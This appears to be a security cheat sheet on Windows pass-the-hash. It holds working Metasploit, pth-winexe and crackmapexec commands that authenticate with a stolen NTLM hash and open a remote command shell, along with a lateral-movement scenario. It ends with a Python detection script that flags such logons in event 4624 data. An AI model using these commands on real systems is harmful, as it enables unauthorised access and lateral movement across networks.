# Pass-the-hash

MSF:

`msf exploit(psexec)> set SMBUser mike`

`msf exploit(psexec)> set SMBPass <LMHASH>:<NTHASH>` (note: if you only have one of the two hashes, place 32 0's on the other side of the `:`)

`msf exploit(psexec)> run`

Allows an attacker to authenticate to a remote target by using a valid combination of username and NTLM/LM hash rather than a cleartext password. This is possible because NTLM/LM password hashes are not salted and remain static between sessions and computers whose combination of username and password is the same.

Consider the following scenario: An organization uses disk-imaging technologies within its network, or otherwise has a local administrative user enabled on multiple computers. A vulnerability on one of these computers has provided us with SYSTEM privileges, through which we dumped the local LM and NTLM hashes. We copy the local administrator NTLM hash and use this discovered hash instead of a password with a patched version of pth-winexe to gain a shell on a different machine, which has the same local administrator / password combination. We begin by setting an environment variable called SMBHASH, containing the password hash we would like to use for authentication.

`# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896`

We can then use the pth-winexe tool to authenticate using the password hash and gain a remote command prompt on the target machine:

`# pth-winexe -U administrator% //10.11.01.76 cmd`

With crackmapexec:

`# crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH`

`# crackmapexec smb <target(s)> -u username -H NTHASH`
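As an added defender-side example (not part of the original page): the logons these tools produce on the target show up as NTLM network logons in Security event 4624, and a widely used triage heuristic flags LogonType 3, LogonProcessName NtLmSsp, authentication package NTLM and KeyLength 0, excluding ANONYMOUS LOGON. The script below applies that heuristic to constructed events and groups the hits by source address and account to surface the local-administrator reuse pattern from the scenario above; field names follow the Windows 4624 schema, while the event values and host names are made up.

```python
from collections import defaultdict


def _ev(computer, logon_type, proc, pkg, key_len, user, ip):
    """Build one constructed 4624 record (field names follow the Windows schema)."""
    return {"EventID": 4624, "Computer": computer, "LogonType": logon_type,
            "LogonProcessName": proc, "AuthenticationPackageName": pkg,
            "KeyLength": key_len, "TargetUserName": user, "IpAddress": ip}


# Constructed sample events, not real logs: one source reusing the local
# administrator account against three hosts, plus benign noise.
SAMPLE_EVENTS = [
    _ev("WS01", 3, "NtLmSsp", "NTLM", 0, "administrator", "10.0.0.5"),
    _ev("WS02", 3, "NtLmSsp", "NTLM", 0, "administrator", "10.0.0.5"),
    _ev("WS03", 3, "NtLmSsp", "NTLM", 0, "Administrator", "10.0.0.5"),
    _ev("WS01", 3, "Kerberos", "Kerberos", 128, "alice", "10.0.0.7"),  # domain logon
    _ev("WS01", 3, "NtLmSsp", "NTLM", 0, "ANONYMOUS LOGON", "10.0.0.9"),  # null session
    _ev("WS02", 2, "User32", "Negotiate", 0, "bob", "-"),  # interactive console logon
    _ev("WS02", 3, "NtLmSsp", "NTLM", 0, "svc_backup", "10.0.0.20"),  # single host
]


def is_pth_candidate(ev):
    """Heuristic: a successful NTLM network logon of the kind psexec-style tools
    produce when authenticating with a hash. Legitimate NTLM logons match too,
    so the result is a candidate list to compare against a baseline."""
    if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
        return False
    if ev.get("LogonProcessName") != "NtLmSsp" or ev.get("AuthenticationPackageName") != "NTLM":
        return False
    if ev.get("KeyLength", 0) != 0:
        return False
    return ev.get("TargetUserName", "").upper() != "ANONYMOUS LOGON"


def pth_candidates(events):
    return [ev for ev in events if is_pth_candidate(ev)]


def lateral_sources(events, min_hosts=2):
    """Group candidate logons by (source IP, account) and keep those that reached
    at least min_hosts distinct computers: the shared-local-admin reuse pattern."""
    hosts = defaultdict(set)
    for ev in pth_candidates(events):
        hosts[(ev["IpAddress"], ev["TargetUserName"].lower())].add(ev["Computer"])
    return {key: sorted(seen) for key, seen in hosts.items() if len(seen) >= min_hosts}


if __name__ == "__main__":
    for (ip, user), targets in lateral_sources(SAMPLE_EVENTS).items():
        print(f"{ip} as {user} -> {', '.join(targets)}")
```

On a real estate the same query is usually run over a SIEM rather than a list of dicts, with the baseline of known NTLM-only systems (legacy appliances, non-domain hosts) subtracted first.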
